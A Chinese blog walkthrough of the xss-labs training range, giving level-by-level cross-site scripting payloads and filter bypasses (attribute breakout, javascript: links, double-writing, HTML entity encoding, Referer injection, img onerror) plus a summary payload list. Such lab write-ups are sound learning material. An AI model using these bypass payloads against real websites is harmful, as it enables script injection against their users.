首页 > 其他分享 >xsslabs靶场

xsslabs靶场

时间:2024-03-09 20:11:22浏览次数:37  
标签:尝试 xsslabs javascript alert &# 靶场 payload 输入

level1

payload:<scirpt>alert(123);</script>

从php代码可以看出level1没有对输入的数据进行防御!
level2
输入level1的payload

可以看到输入到input标签中的value值中,所以用'"用来闭合value,用>来闭合input标签

payload:'"><script>alert(123)</script>

从php代码可以看到level2对图片上输出的内容进行了htmlspecialchars实体转义,但并未对input标签中的value进行实体转化!
level3
首先输入level2的payload进行试探

可以看出文本框中输入的payload被htmlspecialchars函数转义了
payload:' onclick=javascript:alert() '
htmlspecialchars函数

htmlspecialchars函数默认不会转义单引号

php代码查看

从code可以看出对h标签和input标签都进行了转义,因此可以使用如 onclick onfocus onm ouseover等属性跳过
level4
当输入level3的payload后,可以看出单引号并未闭合之前的属性

因此需要闭合之前的vlaue属性,payload:'" onclick=javascript:alert() '

php代码查看

可以看到code中将<>过滤,因此,不能使用payload
而输入后的代码会显示在value属性中,因此本关宜用onclik payload
payload:'" onclick=javascript:alert()
level5

onclick中的on被 o_n替代
尝试a标签

可以看到成功绕过了
payload: '" <a href="javascript:alert()">as</a>
查看code

可以看到script on*都被替代破坏payload
level6
尝试level5的payload

可以看出href也别替代
尝试大小写、双写
payload:'" <a HREF="javascript:alert()">asd</a>

!!!!双写并不可行,因为href是被h_ref替代而不是过滤
level7
用level6的payload尝试

可以看到href被过滤,而不是替代
因此尝试payload:'" <a hrehreff="javascscriptript:alert()">wefr</a>

尝试了'" wefr,但是script也会被过滤,所以尝试了script也双写了
查看code

可以看出很多的属性都被过滤了
leve8
测试发现,会将input标签中的内容发送到友情链接的地址,因此可以构造一个payload

输入payload:javascript:alert();提示javascript变成javasc_cript
尝试javasCript, 同样无效

因为是在href属性内,所以可以将javascript进行编码转换,这样可以绕过xss过滤
payload:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert()

查看code:

发现strtolower函数将输入的内容全部转换为小写,因此大写绕过失败
level9
输入简单payload尝试,发现a标签里面地址显示地址不合法

尝试常见的地址 如http// https://
payload:https://javascript:alert()提示仍然不合法
payload:http://javascript:alert()

可以看到可以识别http://但是出现script被替换
因此可以利用php的注释构造
payload:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert()//http://

查看code:

level10
没有输入地方,尝试url后面的参数值

没有效果
但是检查发现有三个隐藏的文本框,可以尝试给它们赋值,看看效果

构造payload:ip/level10.php?t_sort='" onclick="javascript:alert()" type="text"

level11
检查发现,input中仅有t_re有值,再次尝试level10的尝试方法

url输入尝试发现仅有t_sort有值

输入payload尝试后发现输入的payload被实体化,故不能使用
在发现ref属性的值
发现ref获得的值是:
仔细发现是上一关的ip地址
抓包查看

获得数据包中的reference值和t_ref获得的value值相同,常是将ref的值替换为payload

成功绕过
查看代码

发现获得的t_ref的值value值是来自上一个页面的地址
并且过滤了常规绕过参数
在观察发现t_sort获的值str00会被htmlspecialchars函数过滤,因此可以尝试onclick参数
单引号、双引号尝试失败,故不得绕过

level12
先检查,发现本关和上一关类似,尝试更改t_age值


尝试发现成功
level13
由于靶场error,故没有没有做成功,但方法如上
level4
题有问题,略过
level15
绕不过

关于ng-include
level16
通过url测试发现参数输出到center标签中
尝试构造a标签

测试发现
空格和script都被替换
尝试使用回车替换空格,回车因为不能在搜索框里输入(输入会被省略),因此需要转化为十六进制编码
payload:
http://192.168.10.12:902/level16.php?keyword=<img src="" one rror="alert()"/>
level17
由于embed不在使用,故略
所有关卡payload:

<script>alert()</script>
'"><script>alert(123)</script>
' onclick=javascript:alert() '
'" <a href="javascript:alert()">as</a>
'" <a HREF="javascript:alert()">asd</a>
'" <a hrehreff="javascscriptript:alert()">wefr</a>
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert()
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert()//http://

标签:尝试,xsslabs,javascript,alert,&#,靶场,payload,输入
From: https://www.cnblogs.com/laibunizi/p/18062065

相关文章

  • Vulnhub内网渗透Jangow01靶场通关
    详细请见个人博客靶场下载地址。下载下来后是.vmdk格式,vm直接导入。M1请使用UTM进行搭建,教程见此。该靶场可能出现网络问题,解决方案见此信息搜集arp-scan-l #主机发现ip为192.168.168.15nmap-sV-A-p-192.168.168.15 #端口扫描发现开放了21ftp和80http端口,对......
  • Docker Compose一键搭建安全测试靶场
    1.Docker快速安装1.1.ubuntu系统步骤一:安装必要的一些系统工具sudoapt-getupdatesudoapt-get-yinstallapt-transport-httpsca-certificatescurlsoftware-properties-common步骤二:安装GPG证书curl-fsSLhttps://mirrors.aliyun.com/docker-ce/linux/ubuntu/gp......
  • Sliver C2通关渗透攻击红队内网域靶场2.0
    准备2012server第一台机器开机后,要在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain​手动运行下startWebLogic.cmd​,但是我访问7001遇到了报错:​​是路径配置错误,但是没搜到什么解决方法,全踏马互相抄互相抄。去问chatgpt,给出的解释是去访问http://12......
  • Sliver C2通关渗透攻击红队内网域靶场2.0
    准备2012server第一台机器开机后,要在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain​手动运行下startWebLogic.cmd​,但是我访问7001遇到了报错:​​是路径配置错误,但是没搜到什么解决方法,全踏马互相抄互相抄。去问chatgpt,给出的解释是去访问http://12......
  • Sliver C2通关渗透攻击红队内网域靶场2.0
    准备2012server第一台机器开机后,要在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain​手动运行下startWebLogic.cmd​,但是我访问7001遇到了报错:​​是路径配置错误,但是没搜到什么解决方法,全踏马互相抄互相抄。去问chatgpt,给出的解释是去访问http://12......
  • 红日靶场01多角度打靶笔记
    红日靶场01这个笔记主要是利用这个靶场环境,对内网渗透的思路进行整合一下,因此过程中会涉及多个攻击方式和思路。环境搭建windows7是靶机01Windowsserver2008R2是靶机02Windowsserver2003是靶机03Windows10是攻击01kali是攻击02(cs服务端和msf都在上面)这个靶......
  • Pikachu靶场安装
    安装debian@debian:~$sudodockerpullarea39/pikachuUsingdefaulttag:latestlatest:Pullingfromarea39/pikachuc64513b74145:Pullcomplete......0ebf3d66b35d:PullcompleteDigest:sha256:e9748879af76b68235a6ec66ce28b048323ac31f7f33065d83727cacb3998e0......
  • [Kyanan]配置靶场
    DVWAphp_dest/php.ini;包含路径,删除注释extension=gdallow_url_fopen=Onallow_url_include=OnDVWA/config/config.inc.php$_DVWA['db_user']='dvwa';$_DVWA['db_password']='toor';$_DVWA['recaptcha_public......
  • 靶场搭建----phpstudy2018安装及注意问题
    安装官网下载:https://www.xp.cn/download.html新人推荐2018版本phpstudy介绍系统服务------开机自启非服务模式------开机不自启搭建好环境,此时服务器与客户端同时存在服务器:phpstudy所在的目录客户端:除phpstudy所在目录外的都是客户端调整phpstud......
  • mozhe靶场: WebShell文件上传漏洞分析溯源(第5题) 题解(使用哥斯拉)
    哥斯拉由java编写,可以在linux上使用.个人认为比冰蝎好用,用冰蝎连不上这个靶场,但是哥斯拉可以连的上.github搜哥斯拉就能下载首先登陆后台,弱口令adminadmin点击添加文章,尝试上传一句话木马(一句话木马可以点击哥斯拉的生成)webshell.asp<%evalrequest("pass")%>......